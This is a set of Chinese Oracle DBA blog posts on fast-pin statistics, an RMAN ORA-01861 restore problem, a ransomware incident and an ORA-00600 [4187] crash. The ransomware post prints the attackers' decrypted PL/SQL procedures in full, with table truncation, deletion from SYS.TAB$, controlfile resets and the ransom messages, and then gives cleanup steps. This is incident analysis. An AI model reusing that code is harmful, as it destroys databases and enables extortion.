 14      into p_cg,p_cg_c, p_cgfp,p_cg_ex,p_cg_dir
 15     from v$mystat ms, v$statname sn
 16     where ms.STATISTIC#=sn.STATISTIC#
 17      and sn.NAME in('consistent gets','consistent gets from cache','consistent gets - examination','consistent gets direct');
 18   end get_cg;
 19   /

Procedure created.

www.killdb.com@ declare
  2    l_cg_b  number;
  3    l_cg_a  number;
  4    p_cg_c_a number;
  5    p_cg_c_b number;
  6    l_cgfp_b number;
  7    l_cgfp_a number;
  8    p_cg_ex_b number;
  9    p_cg_ex_a number;
 10    p_cg_dir_b number;
 11    p_cg_dir_a number;
 12   begin
 13    get_cg(l_cg_b, p_cg_c_b,l_cgfp_b,p_cg_ex_b,p_cg_dir_b);
 14    for cur in (select n from (select mod(level, 1000)+1 l from dual connect by
 15  level <= 100000) l, t where t.n=l.l)
 16    loop
 17     null;
 18    end loop;
 19     get_cg(l_cg_a,p_cg_c_a, l_cgfp_a,p_cg_ex_a,p_cg_dir_a);
 20     dbms_output.put_line('consistent gets: '||to_char(l_cg_a-l_cg_b));
 21     dbms_output.put_line('consistent gets from cache: '||to_char(p_cg_c_a-p_cg_c_b));
 22     dbms_output.put_line('consistent gets from cache (fastpath): '||to_char(l_cgfp_a-l_cgfp_b));
 23     dbms_output.put_line('consistent gets - examination: '||to_char(p_cg_ex_a-p_cg_ex_b));
 24     dbms_output.put_line('consistent gets direct: '||to_char(p_cg_dir_a-p_cg_dir_b));
 25    end;
 26    /
consistent gets: 101001
consistent gets from cache: 101001
consistent gets from cache (fastpath):
consistent gets - examination: 100001
consistent gets direct: 0

PL/SQL procedure successfully completed.

www.killdb.com@
www.killdb.com@/
consistent gets: 101001
consistent gets from cache: 101001
consistent gets from cache (fastpath):
consistent gets - examination: 100001
consistent gets direct: 0

PL/SQL procedure successfully completed.

我们不难看出,10gR2版本中压根儿就没有这个一项统计指标。下面我继续来看下Oracle 11g版本的情况(实际上Oracle 11.1 版本就引入了该特性):

[oracle@killdb admin]$ sqlplus "/as sysdba" 

SQL*Plus: Release 11.2.0.4.0 Production on Tue Sep 20 12:22:10 2016

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

www.killdb.com@create table t(
  2  n number,
  3  v varchar2(100),
  4  constraint pk_n primary key (n)); 

Table created.

www.killdb.com@insert into t
  2  select level, rpad('*', 100, '*')
  3   from dual
  4   connect by level <= 1000; 

1000 rows created.

www.killdb.com@create or replace procedure get_cg(
  2    p_cg out number,
  3    p_cg_c out number,
  4    p_cgfp out number,
  5    p_cg_ex out number,
  6    p_cg_dir out number
  7   ) is
  8   begin
  9    select max(case sn.NAME when 'consistent gets' then ms.value end),
 10    max(case sn.NAME when 'consistent gets from cache' then ms.value end),
 11      max(case sn.NAME when 'consistent gets from cache (fastpath)' then ms.value end),
 12      max(case sn.NAME when 'consistent gets - examination' then ms.value end),
 13      max(case sn.NAME when 'consistent gets direct' then ms.value end)
 14      into p_cg,p_cg_c, p_cgfp,p_cg_ex,p_cg_dir
 15     from v$mystat ms, v$statname sn
 16     where ms.STATISTIC#=sn.STATISTIC#
 17      and sn.NAME in('consistent gets','consistent gets from cache','consistent gets from cache (fastpath)','consistent gets - examination','consistent gets direct');
 18   end get_cg;
 19   /

Procedure created.

www.killdb.com@
www.killdb.com@
www.killdb.com@ declare
  2    l_cg_b  number;
  3    l_cg_a  number;
  4    p_cg_c_a number;
  5    p_cg_c_b number;
  6    l_cgfp_b number;
  7    l_cgfp_a number;
  8    p_cg_ex_b number;
  9    p_cg_ex_a number;
 10    p_cg_dir_b number;
 11    p_cg_dir_a number;
 12   begin
 13    get_cg(l_cg_b, p_cg_c_b,l_cgfp_b,p_cg_ex_b,p_cg_dir_b);
 14    for cur in (select n from (select mod(level, 1000)+1 l from dual connect by
 15  level <= 100000) l, t where t.n=l.l)
 16    loop
 17     null;
 18    end loop;
 19     get_cg(l_cg_a,p_cg_c_a, l_cgfp_a,p_cg_ex_a,p_cg_dir_a);
 20     dbms_output.put_line('consistent gets: '||to_char(l_cg_a-l_cg_b));
 21     dbms_output.put_line('consistent gets from cache: '||to_char(p_cg_c_a-p_cg_c_b));
 22     dbms_output.put_line('consistent gets from cache (fastpath): '||to_char(l_cgfp_a-l_cgfp_b));
 23     dbms_output.put_line('consistent gets - examination: '||to_char(p_cg_ex_a-p_cg_ex_b));
 24     dbms_output.put_line('consistent gets direct: '||to_char(p_cg_dir_a-p_cg_dir_b));
 25    end;
 26    /
  consistent gets: 2602
consistent gets from cache: 2602
consistent gets from cache (fastpath): 1400
consistent gets - examination: 1202
consistent gets direct: 0

PL/SQL procedure successfully completed.

大家可以看出,统计指标有所变化。同样的SQL代码在10g和11g版本中执行,Buffer Gets差距是很大的,从10w降低到2600左右。其中11gR2版本中,consistent gets from cache(fastpath)为1400,占据整个逻辑读consistent gets(2602)的一半之多。由此可见,这是一个很大的性能改善。

经过观察分析,发现Oracle 通过隐含参数来控制该功能,参数为:_fastpin_enable,这些我的虚拟机环境的参数设置(也是默认配置):

www.killdb.com@conn roger/roger
Connected.
www.killdb.com@show parameter fastpin

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------
_fastpin_enable                      integer     232205313

可以看出,该参数的值还是较大的,如果将该参数改成0,那么将会是什么结果呢?

www.killdb.com@alter system set "_fastpin_enable"=0 scope=spfile; 

System altered.

www.killdb.com@shutdown immediate
Database closed.
Database dismounted.
ORACLE instance shut down.

www.killdb.com@set serveroutput on
www.killdb.com@@print_buffer.sql
consistent gets: 2639
consistent gets from cache: 2639
consistent gets from cache (fastpath): 0
consistent gets - examination: 1208
consistent gets direct: 0

PL/SQL procedure successfully completed.

www.killdb.com@conn roger/roger
Connected.
www.killdb.com@show parameter fastpin

NAME                                 TYPE        VALUE
------------------------------------ ----------- -----------
_fastpin_enable                      integer     0

www.killdb.com@conn /as sysdba
Connected.
www.killdb.com@@print_buffer.sql

PL/SQL procedure successfully completed.

www.killdb.com@set serveroutput on
www.killdb.com@@print_buffer.sql
consistent gets: 2602
consistent gets from cache: 2602
consistent gets from cache (fastpath): 0
consistent gets - examination: 1202
consistent gets direct: 0

PL/SQL procedure successfully completed.

大家不难看出,当将该参数调整为0之后,consistent gets from cache(fastpath)指标变成0. 经过测试,实际上该参数只要大于1即可启用该新特性。

然而让我感觉到疑惑的地方是,客户的CRM数据库环境中,该参数默认值已经较大了,但是仍然看不到fastpath的指标信息:

SQL> SELECT x.ksppinm NAME, y.ksppstvl VALUE, x.ksppdesc describ
  2    FROM SYS.x$ksppi x, SYS.x$ksppcv y
 WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%';
  3  Enter value for par: fastpin
old   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%'
new   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%fastpin%'

NAME                           VALUE                DESCRIB
------------------------------ -------------------- ------------------------------------------------------------
_fastpin_enable                16777216             enable reference count based fast pins
SQL> select b.name, a.value
  2    from v$sysstat a, v$statname b
  3   where a.STATISTIC# = b.STATISTIC#
  4     and b.NAME like 'consistent gets%';

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2920646704900
consistent gets from cache                                              2919483943030
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947542697858
consistent gets direct                                                     1162762820

SQL>

欲知后事如何,请看下回分解!

Related posts:

  1. 11g新特性之–Query Cache Result 研究
  2. 11g 新特性之–query result cache(2)
  3. 11g 新特性之–query result cache(3)
  4. library cache pin&lock (1)
  5. soft parse 和 library cache lock

Restore Database with ORA-01861

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Restore Database with ORA-01861

今天一个客户问我,有个异机恢复的问题,原库是生产,还在运行,需要将NBU中的备份恢复到另外一个主机上,数据文件均为raw。首先我们来看一下错误:

RMAN> run{
2>
3> allocate channel t1 type 'sbt_tape';
4> allocate channel t2 type 'sbt_tape';
5> send 'NB_ORA_CLIENT=sth05v01';
6> set until time "to_date('2016-11-25 06:50:00','yyyy-mm-dd hh24:mi:ss')";
7> restore database;
8> release channel t1;
9> release channel t2;}

allocated channel: t1
channel t1: sid=540 devtype=SBT_TAPE
channel t1: Veritas NetBackup for Oracle - Release 7.5 (2012020801)

allocated channel: t2
channel t2: sid=539 devtype=SBT_TAPE
channel t2: Veritas NetBackup for Oracle - Release 7.5 (2012020801)

sent command to channel: t1
sent command to channel: t2

executing command: SET until clause

Starting restore at 01-DEC-16

released channel: t1
released channel: t2
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of restore command at 12/01/2016 14:46:30
ORA-01861: literal does not match format string

大家不难看出,rman执行报错了。从上述错误来看,感觉像是nls_date_format设置的问题。的确,如果我们在rman命令行中使用了until time操作,那么建议设置nls_date_Format参数,可以设置os环境变量也可以在rman中执行sql执行。但是这里其实并不是这种情况。实际上我无论是在os设置还是rman命令行中设置,均不会起作用。

针对该问题,Oracle mos有一篇文档RMAN Recovery Session Fails with ORA-1861 (文档 ID 852723.1) 记录十分详细,里面提到了一些解决方案,其中也提到了一些检测判断是否为文章中提到的bug的方式。

不幸的是,我参考文章的的方式,执行了如下脚本发现根本不返回记录,也就说明不是文档中描述的这个问题。

于是我进一步使用rman target / debug trace=/tmp/rman.trc进行跟踪,检查发现rman在执行脚本的时候,在运行如下的SQL时报错:

RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of restore command at 12/01/2016 17:38:21
RMAN-06003: ORACLE error from target database:
ORA-01861: literal does not match format string
RMAN-06097: text of failing SQL statement: select fhscn ,to_date(fhtim,'MM/DD/RR HH24:MI:SS','NLS_CALENDAR=Gregorian') ,fhcrs ,fhrls ,to_date(fhrlc,'MM/DD/RR HH24:MI:SS','NLS_CALENDAR=Gregorian') ,fhafs ,fhrfs ,fhrft ,hxerr ,fhfsz ,fhsta into :b1,:b2:b3,:b4,:b5,:b6:b7,:b8:b9,:b10:b11,:b12:b13,:b14,:b15,:b16  from x$kcvfhall where hxfil=:b17
RMAN-06099: error occurred in source file: krmk.pc, line: 5655
DBGMISC:        ENTERED krmkursr [17:38:21.493]

DBGSQL:          EXEC SQL AT TARGET select decode(open_mode,'MOUNTED',0,'READ WRITE',1,'READ ONLY',1,0) into :b1  from v$database  [17:38:21.493]
DBGSQL:             sqlcode=0 [17:38:21.494]
DBGSQL:                :b1 = 0

从上面的内容来看,上述的select fhscn语句是报错的关键。将该SQL挑出来,单独执行,发现果然有问题。如下是我的测试结果:

SQL> select fhscn,
  2         to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  3         fhcrs,
  4         fhrls,
  5         to_date(fhrlc, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  6         fhafs,
  7         fhrfs,
  8         fhrft,
  9         hxerr,
 10         fhfsz,
 11         fhsta
 12    from x$kcvfhall
 13   where hxfil =252;
       to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
               *
ERROR at line 2:
ORA-01861: literal does not match format string

SQL> l
  1  select fhscn,
  2         to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  3         fhcrs,
  4         fhrls,
  5         to_date(fhrlc, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  6         fhafs,
  7         fhrfs,
  8         fhrft,
  9         hxerr,
 10         fhfsz,
 11         fhsta
 12    from x$kcvfhall
 13*  where hxfil <252 and hxfil > 252
SQL> /

FHSCN            TO_DATE(FHTIM,'MM FHCRS            FHRLS            TO_DATE(FHRLC,'MM FHAFS            FHRFS            FHRFT                     HXERR      FHFSZ      FHSTA
---------------- ----------------- ---------------- ---------------- ----------------- ---------------- ---------------- -------------------- ---------- ---------- ----------
408027070532     02/23/88 02:19:50 0                0                                  313537986655                                                    8          0          0
339307855959     02/21/88 13:55:10 0                0                                  266292363311                                                    8          0          0
231931576374     02/07/88 04:01:52 0                0                                  206161641523                                                    8          0          0
214751510576     02/09/88 10:38:52 0                0                                  206161772597                                                    8          0          0
287767330911     03/02/88 17:11:37 0                0                                  313537593439                                                    8          0          0
287769034817     03/11/88 01:26:40 0                0                                  335013675081                                                    8          0          0
356487069774     03/11/88 01:26:33 0                0                                  335013675081                                                    8          0          0
257701183536     02/27/88 15:33:21 0                0                                  300653936719                                                    8          0          0
137441050656     01/25/88 06:33:04 0                0                                  137441050656                                                    8          0          0
0                                  0                0
......

从测试结果来看,我们可以断定第252号文件在控制文件中的信息可能有点问题。这个问题我也是第一次遇到。不过我将controlfile 的内容dump出来之后,过滤定位到file=252的内容,发现似乎并没有异常的地方:

sth14n01$(/oracle/app/admin/SETTLE/bdump)cat /oracle/app/product/10.2.0/db_1/rdbms/log/settle1_ora_10832.trc|grep 'File=252'
 RECID #39423 Recno 1071 Record timestamp  11/25/16 00:51:28 File=252 Incremental backup level=0
 RECID #38917 Recno 565 Record timestamp  11/17/16 20:53:38 File=252 Incremental backup level=0

RECID #39423 Recno 1071 Record timestamp  11/25/16 00:51:28 File=252 Incremental backup level=0
  File is part of the incremental strategy
  Backup set key: stamp=928792972, count=17980
  Creation checkpointed at scn: 0x0caf.169d9ef4 10/28/14 12:19:55
  File header checkpointed at scn: 0x0dc6.4f902943 11/24/16 22:02:53
  Resetlogs scn and time scn: 0x0000.0007c754 12/31/13 10:28:23
  Incremental Change scn: 0x0000.00000000
  Absolute Fuzzy scn: 0x0000.00000000
  Newly-marked media corrupt blocks  0 Total media corrupt blocks 0
  Total logically corrupt blocks 0  Block images written to backup 1048456
  File size at backup time 1048575  Block size 8192
  Low Offline Range Recid 0
  Number of blocks read during backup 1048575

   RECID #38917 Recno 565 Record timestamp  11/17/16 20:53:38 File=252 Incremental backup level=0
  File is part of the incremental strategy
  Backup set key: stamp=928173622, count=17846
  Creation checkpointed at scn: 0x0caf.169d9ef4 10/28/14 12:19:55
  File header checkpointed at scn: 0x0dc4.fb8c934d 11/17/16 18:00:23
  Resetlogs scn and time scn: 0x0000.0007c754 12/31/13 10:28:23
  Incremental Change scn: 0x0000.00000000
  Absolute Fuzzy scn: 0x0000.00000000
  Newly-marked media corrupt blocks  0 Total media corrupt blocks 0
  Total logically corrupt blocks 0  Block images written to backup 1048456
  File size at backup time 1048575  Block size 8192
  Low Offline Range Recid 0
  Number of blocks read during backup 1048575

不难看出,上述的内容似乎没有什么问题。从整体现象来看与Oracle mos文档中提到的bug确实很像,几乎完全一样。但是通过mos文档中提到的脚本检查缺没有问题,这让我感觉很奇怪。

不过这里有点不确认的是,我是在生产库进行检测的,同时执行select语句也没有任何问题。说明原生产库的controlfile本身就是ok的。按理说应该在新环境中进行检测。

简而言之,这个问题确实有些怪异。不过还好的是,要解决或者绕过这个问题并不难,比如可以restore tablespace  xx,xxx  skip datafile 252即可。最后单独备份这个252文件进行restore,然后即可。

Related posts:

  1. RMAN-06023 and ORA-19909 ?
  2. rman备份与large_pool_size的关系
  3. database crash with ora-00494
  4. dataguard主库丢失archivelog,如何不重建备库?
  5. Another one recover database case!

比特币攻击案例重现江湖

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 比特币攻击案例重现江湖

今天凌晨4:50节点公司400转过来的求助电话,来自广西某个医院的客户;电话中说数据库被攻击了,业务完全停止,言谈之中表现的时分地迫切和着急。

首先我们来看看数据库的日志是什么?

Sat Feb 11 23:32:57 2017
Errors in file D:\APP\ADMINISTRATOR\diag\rdbms\xxx\xxx\trace\xxx_ora_17664.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20313: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: 在 "PORTAL_HIS.DBMS_SYSTEM_INTERNAL         ", line 15
ORA-06512: 在 line 2
Sat Feb 11 23:32:57 2017
Errors in file D:\APP\ADMINISTRATOR\diag\rdbms\xxx\xxx\trace\xxx_ora_17672.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20313: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: 在 "PORTAL_HIS.DBMS_SYSTEM_INTERNAL         ", line 15
ORA-06512: 在 line 2
Sat Feb 11 23:33:13 2017

大家不难看出,很明显跟2016年11月份爆发的比特币攻击案例如出一辙。这又是sql rush Team干的好事。很显然,我们去年大力宣传的比特币攻击事件,仍然被很多企业客户所忽视,最终出现了今天的悲剧。言归正转,如何处理这个问题呢?

这里通过日志,直接查询最近有过ddl操作的对象,发现果然跟alert log完全一样。如下所说:

 

我们不难看出,上述6个对象,可能是问题的关键。那么我们就来看看上面6个对象的内容是什么。首先我们来看下trigger:

很明显,这是hacker创建的恶意trigger。遗憾的看上去名字是这样,具体查不到内容?既然如此,我们先来看看存储过程,发现3个存储过程都是加密的。通过解密之后,发现代码如下:

PROCEDURE "DBMS_CORE_INTERNAL         " IS
  V_JOB   NUMBER;
  DATE1 INT :=10;
  STAT VARCHAR2(2000);
  V_MODULE VARCHAR2(2000);
  E1 EXCEPTION;
  PRAGMA EXCEPTION_INIT(E1, -20315);
  CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
   IF (DATE1>=1200) THEN
    FOR I IN TLIST LOOP
    DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
    STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
    DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
    COMMIT;
    END LOOP;
    END IF;
        IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
     THEN
      RAISE E1;
    END IF;
EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
END;

PROCEDURE "DBMS_SUPPORT_INTERNAL         " IS
DATE1 INT :=10;
E1 EXCEPTION;
 PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';
   DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
   COMMIT;
   EXECUTE IMMEDIATE 'alter system checkpoint';
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
   FOR I IN 1..2046 LOOP
   DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
   DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库 ');
   END LOOP;
   RAISE E1;
   END IF;
   EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20312,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    NULL;
END;

PROCEDURE "DBMS_SYSTEM_INTERNAL         " IS
  DATE1 INT :=10;
  E1 EXCEPTION;
  PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
   IF (DATE1>=1200) THEN
    IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
     THEN
      RAISE E1;
    END IF;
    END IF;
EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20313,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    NULL;
END;

我们可以看出,SQL rush Team还是很熟悉Oracle的,对于dbms包的利用,比我们都熟悉呀!

通过看上述解密之后的代码,才恍然大悟,Hacker居然是在Trigger和存储过程名称后面加了9个空格;注意是9个空格,一个都不能少。

我们再仔细阅读前面2段代码,可以看出这是比较坑爹一个Heacker。通过轮寻会不断产生truncate table 的Job,而且做这些操作之前会通过表的分析时间来判断数据库的运行时间,如果超过1200天,则爆发这个勒索行为(因为长时间运行,说明数据库是有价值的)。

最后一个存储过程会限制程序等连接,导致客户业务无法访问数据库。

了解了上述3个存储过程之后,解决方法就不难了,大致如下:

1、alter system set job_queue_process=0 scope=both ;并重启db(为什么要重启呢?因为此时数据库肯定已经产生了大量的library cache lock,无法操作)。

2、drop上述trigger 和存储过程:

drop trigger portal_his."DBMS_CORE_INTERNAL         " ;
drop trigger portal_his."DBMS_SUPPORT_INTERNAL         " ;
drop trigger portal_his."DBMS_SYSTEM_INTERNAL         " ;

drop PROCEDURE portal_his."DBMS_CORE_INTERNAL         " ;
drop PROCEDURE portal_his."DBMS_SUPPORT_INTERNAL         " ;
drop PROCEDURE portal_his."DBMS_SYSTEM_INTERNAL         " ;

3、删除Hacker创建的大量Job

经过检查发现客户的业务用户portal_his下面被创建了14万个Job。由于内容实在是太多了,因此简单拼一个SQL来删除有问题的Job。

select 'exec dbms_ijob.remove('||job||');'
from dba_jobs
where schema_user='PORTAL_HIS' and what like '%truncate%';

4、确认被truncate的表。

最后恢复之后,客户反映业务基本上正常,但是仍然有部分业务数据看不到,详查之下发现有部分表的数据看不到了?但是客户也说不上来,到底哪些表有问题?那么怎么判断呢?

其实很简单,通过dba_objects.last_ddl_Time来判断该业务用户下最近被ddl操作的表有哪些即可,最后发现有68个表。通过ODU恢复这部分被truncate的表数据即可。

 

请大家仔细检查你的环境,不要再出现类似的问题,为自己或公司造成损失!如果遇到此类问题,请联系我们,获取专业技术支持!

No related posts.

ORA-00600: internal error code, arguments: [4187]

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: ORA-00600: internal error code, arguments: [4187]

前不久某客户的一套Oracle RAC,其中一个节点由于主机宕机重启后,数据库频繁crash,信息如下:

Block recovery completed at rba 149666.7.16, scn 3562.2643076291
Non-fatal internal error happenned while SMON was doing flushing of monitored table stats.
SMON exceeded the maximum limit of 100 internal error(s).
Errors in file /oracle/app/oracle/diag/rdbms/abm/abm2/trace/abm2_smon_10879294.trc:
ORA-00600: internal error code, arguments: [4187], [],

从上述错误来看,很明显是SMON进程在进行事务恢复时出现了异常,当报错此时达到100次时,实例会被强制crash重启。
首先我们这里来看下上述trace文件的内容:

ORA-00600: internal error code, arguments: [4187], [], [
Error 600 in redo application callback
Dump of change vector:
TYP:0 CLS:55 AFN:4 DBA:0x01000110 OBJ:4294967295 SCN:0x0dea.957d672f SEQ:1 OP:5.2 ENC:0 RBL:0
ktudh redo: slt: 0x0021 sqn: 0x00000001 flg: 0x0411 siz: 80 fbi: 0
            uba: 0x0107691f.9399.17    pxid:  0x0000.000.00000000
Block after image is corrupt:
buffer rdba: 0x01000110
scn: 0x0dea.957d672f seq: 0x01 flg: 0x04 tail: 0x672f2601
frmt: 0x02 chkval: 0xb7ac type: 0x26=KTU SMU HEADER BLOCK
Hex dump of corrupt header 3 = CHKVAL
Dump of memory from 0x07000102A717A000 to 0x07000102A717A014
。。。。。。
7000102A717BFF0 00000000 00000000 00000000           [............]
kcra_dump_redo_internal: skipped for critical process
Doing block recovery for file 4 block 272
Block header before block recovery:
buffer tsn: 4 rdba: 0x01000110 (4/272)
scn: 0x0dea.957d672f seq: 0x01 flg: 0x04 tail: 0x672f2601
frmt: 0x02 chkval: 0xb7ac type: 0x26=KTU SMU HEADER BLOCK
Resuming block recovery (PMON) for file 4 block 272
Block recovery from logseq 149687, block 51 to scn 15301400723442

从上述信息来看,Oracle 提示undo block可能有损,因为这里提示为block after image. 很明显这个buffer block地址是file 4 block 272.所以这里我先尝试dbv 检测一下该文件(本质上是undo datafile)是否存在异常,如下是dbv的结果。

ABM-DB2:oracle:/oracle/app/oracle/diag/rdbms/abm/abm2/trace$dbv userid=system/oracle  file='+DG_DATA/abm/datafile/undotbs2.263.819160701' blocksize=8192

DBVERIFY: Release 11.2.0.4.0 - Production on Fri Mar 17 21:26:44 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

DBVERIFY - Verification starting : FILE = +DG_DATA/abm/datafile/undotbs2.263.819160701

DBVERIFY - Verification complete

Total Pages Examined         : 1310720
Total Pages Processed (Data) : 0
Total Pages Failing   (Data) : 0
Total Pages Processed (Index): 0
Total Pages Failing   (Index): 0
Total Pages Processed (Other): 1310719
Total Pages Processed (Seg)  : 17
Total Pages Failing   (Seg)  : 0
Total Pages Empty            : 1
Total Pages Marked Corrupt   : 0
Total Pages Influx           : 0
Total Pages Encrypted        : 0
Highest block SCN            : 0 (0.0)

我检测发现undo 文件居然是ok。那么问题出在什么地方呢? 既然这是undo segment header block,那么就dump一下看看。

  Extent Control Header
  -----------------------------------------------------------------
  Extent Header:: spare1: 0      spare2: 0      #extents: 88     #blocks: 569743
                  last map  0x00000000  #maps: 0      offset: 4080
      Highwater::  0x01076920  ext#: 52     blk#: 2208   ext size: 8192
  #blocks in seg. hdr's freelists: 0
  #blocks below: 0
  mapblk  0x00000000  offset: 52
                   Unlocked
     Map Header:: next  0x00000000  #extents: 88   obj#: 0      flag: 0x40000000
  Extent Map
  -----------------------------------------------------------------
   0x01000111  length: 7
   0x1844b980  length: 8
   0x010ced80  length: 8192
   ......
  TRN CTL:: seq: 0x9399 chd: 0x0021 ctl: 0x0010 inc: 0x00000000 nfb: 0x0003
            mgc: 0xb000 xts: 0x0068 flg: 0x0001 opt: 2147483646 (0x7ffffffe)
            uba: 0x0107691f.9399.15 scn: 0x0dea.957d64f7
Version: 0x01
  FREE BLOCK POOL::
    uba: 0x0107691f.9399.16 ext: 0x34 spc: 0x1486
